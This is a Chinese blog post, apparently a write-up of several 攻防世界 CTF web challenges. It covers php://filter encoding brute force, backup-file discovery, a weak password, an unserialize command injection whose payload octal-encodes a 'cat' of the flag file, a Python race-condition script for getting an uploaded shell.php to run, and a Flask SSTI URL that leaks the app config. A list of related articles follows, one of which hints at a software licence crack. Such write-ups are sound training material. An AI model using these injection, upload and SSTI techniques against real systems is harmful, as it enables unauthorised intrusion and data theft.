攻防世界 文件上传

news/2025/2/9 5:51:45 标签: php

题目名称-文件包含

今天的题大概提一下解题思路就好了

这里要使用php://filter 在此基础上因为网页过滤了一些关键字 我们要进行爆破

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*

就得到了cyberpeace{d85dfd5b23264ede9fc8e1f9bc93a382}

back up

这是一个备份文件的题

/index.php.bak

常见备份文件后缀 :

.git .svn .swp .~ .bak .bash_history .bak

weak_auth

题目描述告诉我们随手设的密码 所以可能是弱密码 我们可以直接进行爆破

很轻松就得到了flag

unseping

又是php代码的审计 这跟昨天写的差不多 都是base编码后反序列化传入 我们中间可以使用正则绕过

wp的payload

$a = new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));

wzsc_文件上传

import requests
import threading
import os
 
class RaceCondition(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
 
        self.url = 'http://61.147.171.105:62418/upload/a.php'
        self.uploadUrl = 'http://61.147.171.105:62418/upload/shell.php'
 
    def _get(self):
        print('try to call uploaded file...')
        r = requests.get(self.url)
        if r.status_code == 200:
            print('[*] create file shell.php success.')
            os._exit(0)
 
    def _upload(self):
        print('upload file...')
        rs = requests.get(self.uploadUrl)
        if rs.status_code == 200:
            print('[*] create file shell.php success.')
            os._exit(0)
 
    def run(self):
        while True:
            for i in range(5):
                self._get()
 
            for i in range(10):
                self._upload()
                self._get()
 
if __name__ == '__main__':
    threads = 50
 
    for i in range(threads):
        t = RaceCondition()
        t.start()
 
    for i in range(threads):
        t.join()
​

这道题我的蚁剑有问题 所以只放了wp的脚本 但我的文件上传也一直不成功

shrine

不规则 我们查看源码

61.147.171.105:64225/shrine/%7B%7Bget_flashed_messages.globals['current_app'].config%7D%7D

这是在shrine路径下的ssti注入,由于过滤了config 和self,可以用get_flashed_messages函数

SSTI

是一种Web应用漏洞,攻击者通过注入恶意模板代码,使服务器在渲染模板时执行这些代码,从而导致敏感信息泄露、代码执行、命令执行等问题

SSTI漏洞的产生主要是因为Web应用程序在使用模板引擎时,未对用户输入进行严格过滤或验证,直接将用户输入作为模板内容的一部分进行渲染

get_flashed_messages函数

是 Flask 框架中用于获取闪现消息(Flash Messages)的函数。闪现消息是一种在请求结束时记录消息,并在下一个请求中访问这些消息的机制,通常用于在重定向后显示一次性消息


http://www.niftyadmin.cn/n/5845623.html

相关文章

node.js + html + Sealos容器云 搭建简易多人实时聊天室demo 带源码

node.js html Sealos容器云 搭建简易多人实时聊天室demo 带源码 前言功能介绍(demo演示)sealos官网配置node.js 编写服务端代码前端ui 调用接口整体项目目录部署到服务器 前言 hello哦盆友们,这次我们来十几行代码做一个超简单的多人聊天…

zzcms接口index.php id参数存在SQL注入漏洞

zzcms接口index.php id参数存在SQL注入漏洞 漏洞描述 ZZCMS 2023中发现了一个严重漏洞。该漏洞影响了文件/index.php中的某些未知功能,操纵参数id会导致SQL注入,攻击可能是远程发起的,该漏洞已被公开披露并可被利用。攻击者可通过sql盲注等手段,获取数据库信息。 威胁等级:…

AWK系统学习指南:从文本处理到数据分析的终极武器 介绍

目录 一、AWK核心设计哲学解析 1.1 记录与字段的原子模型 1.2 模式-动作范式 二、AWK编程语言深度解析 2.1 控制结构 说明: 2.2 关联数组 代码说明: 示例输入和输出: 注意事项: 2.3 内置函数库 三、高级应用技巧 3.1…

Delphi语言的云计算

Delphi语言的云计算应用探索 引言 随着信息技术的迅猛发展,云计算已经成为现代计算机科学中一个不可或缺的重要组成部分。云计算不仅改变了企业的IT基础设施部署方式,还开启了新一轮的经济发展模式。开发者们也在积极寻找合适的编程语言,以…

Pycharm 2024版本出现 We could not validate your license怎么办?解决方法一步到位!

问题:最开始认证会显示成功,但后续会不断弹出窗口显示无法认证 证书 解决: 保留你当前的破姐脚本,删除其他机活文件夹即可 1.先选择试用,进入项目创建界面,新建项目 new project![](https://i-blog.csdnim…

算法14(力扣622)设置循环队列

1、问题 设计你的循环队列实现。 循环队列是一种线性数据结构,其操作表现基于 FIFO(先进先出)原则并且队尾被连接在队首之后以形成一个循环。它也被称为“环形缓冲器”。 循环队列的一个好处是我们可以利用这个队列之前用过的空间。在一个普…

优惠券平台(十五):实现兑换/秒杀优惠券功能(2)

业务背景 在上一节中,我们介绍了通过数据库扣减完成用户兑换优惠券的逻辑,这种方式虽然稳妥,但性能有所不足,因为主流程的操作是同步执行的,导致响应时间变长,吞吐量下降。在本章节中,我们通过…

基于对比增强的超声视频的域知识为乳腺癌诊断提供了深度学习

Domain Knowledge Powered Deep Learning for Breast Cancer Diagnosis Based on Contrast-Enhanced Ultrasound Videos 期刊分析摘要引言相关工作乳腺癌中的CAD基于乳房CEU的CAD方法整体框架原始C3D骨干领域知识指导的时间注意模块(DKG-TMA)域知识引导的通道注意模块数据集和实…